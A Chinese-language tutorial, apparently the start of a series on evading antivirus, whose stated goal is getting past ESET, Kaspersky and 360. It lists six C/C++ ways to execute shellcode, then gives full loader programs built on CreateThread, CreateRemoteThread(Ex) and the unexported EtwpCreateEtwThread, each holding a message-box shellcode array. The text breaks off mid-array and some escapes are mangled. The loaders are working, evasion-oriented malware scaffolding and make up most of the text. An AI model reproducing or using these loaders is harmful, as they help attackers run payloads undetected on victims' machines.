所有的免杀学习都需要从如何执行shellcode开始,那么该如何执行shellcode呢?执行shellcode的方式又有哪些呢?
该专题就是从入门开始,一步步打基础。
学完免杀达到的效果
过ESET
过卡巴斯基(静态+动态)&&360核晶
首先我们需要知道,执行shellcode的方式,有哪些?
shellcode 加载方法
shellcode加载方法有以下6种,都是最简单的入门方式。
1.指针执行
//头文件不写了
//隐藏黑框
#pragma comment(linker, "/subsystem:"Windows" /entry:"mainCRTStartup
"")
int main(){
unsigned char buf[] = "xfcxe8";
((void(*)(void))&buf)();
}2.申请内存加载
int main()
{
char buf[] = "xfcxe8";
LPVOID exe;
exe = VirtualAlloc(buf, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exe, buf, sizeof(buf));
((void(*)())exe)();
}
3.嵌入汇编加载
int main()
{
unsigned char buf[] = "xfcxe8";
DWORD p;
void* code = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE);
CopyMemory(code, buf, sizeof(buf));
__asm {
mov eax, code
push eax
ret
}
}
unsigned char buf[] = "xfcxe8";
DWORD p;
VirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &p);
__asm {
lea eax,buff
push eax
ret
}
int main()
{
unsigned char buf[] = "xfcxe8";
__asm
{
mov eax, offset buf
jmp eax
}
}4.创建线程加载
unsigned char buf[] = "xfcxe8";
DWORD p;
void* code = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
CopyMemory(code, buf, sizeof(buf));
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)code, 0, 0, 0);
system("pause");5.强制类型转换
int main()
{
unsigned char buf[] = "xfcxe8";
((void(WINAPI*)(void)) & buf)();
}
6.汇编花指令
int main()
{
unsigned char buf[] = "xfcxe8";
__asm
{
mov eax, offset buf;
_emit 0xFF;
_emit 0xE0;
}
}创建线程加载
在了解加载shellcode方式之后,我们本篇幅来详细介绍一些创建线程方式加载shellcode的方法:
CreateRemoteThreadEx-注入自身.cpp
// CreateRemoteThreadEx-注入自身.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
LPVOID exec = VirtualAlloc(0, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD odProtect = 0;
DWORD dwThreadID = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &odProtect);
if (bRet != 0)
{
HANDLE hThread = CreateRemoteThreadEx(GetCurrentProcess(), NULL, NULL, (LPTHREAD_START_ROUTINE)exec, NULL, NULL, NULL, &dwThreadID);
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
std::cout << "Hello World!n";
}
CreateRemoteThread-注入自身.cpp
// CreateRemoteThread-注入自身.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
LPVOID exec = VirtualAlloc(NULL, sizeof(x86_nullfree_msgbox), MEM_COMMIT, PAGE_READWRITE);
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
DWORD old_Protect = 0;
DWORD dwThreadID = 0;
BOOL bRet = VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &old_Protect);
if (bRet != 0)
{
HANDLE hThread = CreateRemoteThread(GetCurrentProcess(), NULL, NULL, (LPTHREAD_START_ROUTINE)exec, NULL, NULL, &dwThreadID);
WaitForSingleObjectEx(hThread, -1, TRUE);
}
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
std::cout << "Hello World!n";
}
CreateThread.cpp
// CreateThread.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
0x00, 0x57, 0x89, 0x55, 0xF8, 0x64, 0xA1, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x48, 0x0C, 0x89, 0x4D,
0xFC, 0x8B, 0x45, 0xFC, 0x8B, 0x58, 0x0C, 0x8B, 0xFB, 0x0F, 0x1F, 0x80, 0x00, 0x00, 0x00, 0x00,
0x8B, 0x47, 0x30, 0x85, 0xC0, 0x74, 0x35, 0x0F, 0xB7, 0x08, 0x66, 0x85, 0xC9, 0x74, 0x1D, 0x90,
0x0F, 0xB7, 0x32, 0x66, 0x85, 0xF6, 0x74, 0x14, 0x66, 0x3B, 0xCE, 0x75, 0x0F, 0x0F, 0xB7, 0x48,
0x02, 0x83, 0xC0, 0x02, 0x83, 0xC2, 0x02, 0x66, 0x85, 0xC9, 0x75, 0xE4, 0x0F, 0xB7, 0x08, 0x0F,
0xB7, 0x02, 0x66, 0x3B, 0xC8, 0x74, 0x12, 0x8B, 0x3F, 0x8B, 0x55, 0xF8, 0x3B, 0x1F, 0x75, 0xC0,
0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x47, 0x18, 0x5F, 0x5E, 0x5B, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x14, 0x53, 0x8B, 0xD9, 0x89, 0x55, 0xF4, 0x56, 0x57, 0x33, 0xFF,
0x8B, 0x43, 0x3C, 0x8B, 0x44, 0x18, 0x78, 0x03, 0xC3, 0x8B, 0x70, 0x24, 0x8B, 0x48, 0x20, 0x03,
0xF3, 0x89, 0x75, 0xF0, 0x03, 0xCB, 0x8B, 0x70, 0x1C, 0x8B, 0x40, 0x18, 0x03, 0xF3, 0x89, 0x4D,
0xF8, 0x89, 0x75, 0xEC, 0x89, 0x45, 0xFC, 0x85, 0xC0, 0x74, 0x3A, 0x0F, 0x1F, 0x44, 0x00, 0x00,
0x8B, 0x0C, 0xB9, 0x8B, 0xF2, 0x03, 0xCB, 0x8A, 0x01, 0x84, 0xC0, 0x74, 0x16, 0x0F, 0x1F, 0x00,
0x8A, 0x16, 0x84, 0xD2, 0x74, 0x0D, 0x3A, 0xC2, 0x75, 0x09, 0x8A, 0x41, 0x01, 0x41, 0x46, 0x84,
0xC0, 0x75, 0xED, 0x8A, 0x11, 0x3A, 0x16, 0x74, 0x15, 0x8B, 0x4D, 0xF8, 0x47, 0x8B, 0x55, 0xF4,
0x3B, 0x7D, 0xFC, 0x72, 0xCB, 0x5F, 0x5E, 0x33, 0xC0, 0x5B, 0x8B, 0xE5, 0x5D, 0xC3, 0x8B, 0x45,
0xF0, 0x8B, 0x4D, 0xEC, 0x0F, 0xB7, 0x04, 0x78, 0x5F, 0x5E, 0x8B, 0x04, 0x81, 0x03, 0xC3, 0x5B,
0x8B, 0xE5, 0x5D, 0xC3, 0x00
};
int main()
{
SIZE_T oldProtect = 0;
printf("buf: %dn", sizeof(x86_nullfree_msgbox));
PVOID exec = VirtualAlloc(NULL,sizeof(x86_nullfree_msgbox),MEM_COMMIT,PAGE_READWRITE);
if (exec == NULL)
{
printf("VirtualAlloc is ERRORn");
}
RtlMoveMemory(exec, x86_nullfree_msgbox, sizeof(x86_nullfree_msgbox));
if (VirtualProtect(exec, sizeof(x86_nullfree_msgbox), PAGE_EXECUTE_READWRITE, &oldProtect) != 0)
{
HANDLE h_thread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
WaitForSingleObject(h_thread, -1);
}
// deallocate the space
printf("yyyyyyn");
VirtualFree(exec, sizeof(x86_nullfree_msgbox), MEM_RELEASE);
}
EtwpCreateEtwThread-未导出函数.cpp
// EtwpCreateEtwThread-未导出函数.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//
#include <iostream>
#include <windows.h>
unsigned char x86_nullfree_msgbox[] = {
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x68, 0x33, 0xC0, 0xC7, 0x45, 0xEC, 0x75, 0x73, 0x65, 0x72, 0x56,
0x57, 0x8D, 0x4D, 0x98, 0xC7, 0x45, 0xF0, 0x33, 0x32, 0x2E, 0x64, 0x66, 0xC7, 0x45, 0xF4, 0x6C,
0x6C, 0xC6, 0x45, 0xF6, 0x00, 0xC7, 0x45, 0xD4, 0x4D, 0x65, 0x73, 0x73, 0xC7, 0x45, 0xD8, 0x61,
0x67, 0x65, 0x42, 0xC7, 0x45, 0xDC, 0x6F, 0x78, 0x41, 0x00, 0xC7, 0x45, 0x98, 0x6B, 0x00, 0x65,
0x00, 0xC7, 0x45, 0x9C, 0x72, 0x00, 0x6E, 0x00, 0xC7, 0x45, 0xA0, 0x65, 0x00, 0x6C, 0x00, 0xC7,
0x45, 0xA4, 0x33, 0x00, 0x32, 0x00, 0xC7, 0x45, 0xA8, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x45, 0xAC,
0x6C, 0x00, 0x6C, 0x00, 0x66, 0x89, 0x45, 0xB0, 0xC7, 0x45, 0xB4, 0x47, 0x65, 0x74, 0x50, 0xC7,
0x45, 0xB8, 0x72, 0x6F, 0x63, 0x41, 0xC7, 0x45, 0xBC, 0x64, 0x64, 0x72, 0x65, 0x66, 0xC7, 0x45,
0xC0, 0x73, 0x73, 0x88, 0x45, 0xC2, 0xC7, 0x45, 0xC4, 0x4C, 0x6F, 0x61, 0x64, 0xC7, 0x45, 0xC8,
0x4C, 0x69, 0x62, 0x72, 0xC7, 0x45, 0xCC, 0x61, 0x72, 0x79, 0x41, 0x88, 0x45, 0xD0, 0xE8, 0xAD,
0x00, 0x00, 0x00, 0x8B, 0xF0, 0x8D, 0x45, 0xB4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75, 0x1C, 0x8B,
0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xB4, 0x2B, 0x4C, 0x30, 0x10, 0x8B, 0x44, 0x30,
0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x3C, 0x30, 0x03, 0xFE, 0xEB, 0x0C, 0x8D, 0x55, 0xB4, 0x8B, 0xCE,
0xE8, 0x0B, 0x01, 0x00, 0x00, 0x8B, 0xF8, 0x8D, 0x45, 0xC4, 0xA9, 0x00, 0x00, 0xFF, 0xFF, 0x75,
0x1C, 0x8B, 0x4E, 0x3C, 0x8B, 0x44, 0x31, 0x78, 0x8D, 0x4D, 0xC4, 0x2B, 0x4C, 0x30, 0x10, 0x8B,
0x44, 0x30, 0x1C, 0x8D, 0x04, 0x88, 0x8B, 0x04, 0x30, 0x03, 0xC6, 0xEB, 0x0A, 0x8D, 0x55, 0xC4,
0x8B, 0xCE, 0xE8, 0xD9, 0x00, 0x00, 0x00, 0x8D, 0x4D, 0xEC, 0x51, 0xFF, 0xD0, 0x8D, 0x4D, 0xD4,
0x51, 0x50, 0xFF, 0xD7, 0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0xC7, 0x45, 0xE0, 0x48, 0x65, 0x6C, 0x6C,
0x51, 0x8D, 0x4D, 0xE0, 0xC7, 0x45, 0xE4, 0x6F, 0x57, 0x6F, 0x72, 0x51, 0x6A, 0x00, 0x66, 0xC7,
0x45, 0xE8, 0x6C, 0x64, 0xC6, 0x45, 0xEA, 0x00, 0xC7, 0x45, 0xF8, 0x54, 0x65, 0x73, 0x74, 0xC6,
0x45, 0xFC, 0x00, 0xFF, 0xD0, 0x5F, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x5E, 0x8B, 0xE5, 0x5D, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x53, 0x56, 0x8B, 0xD1, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00,
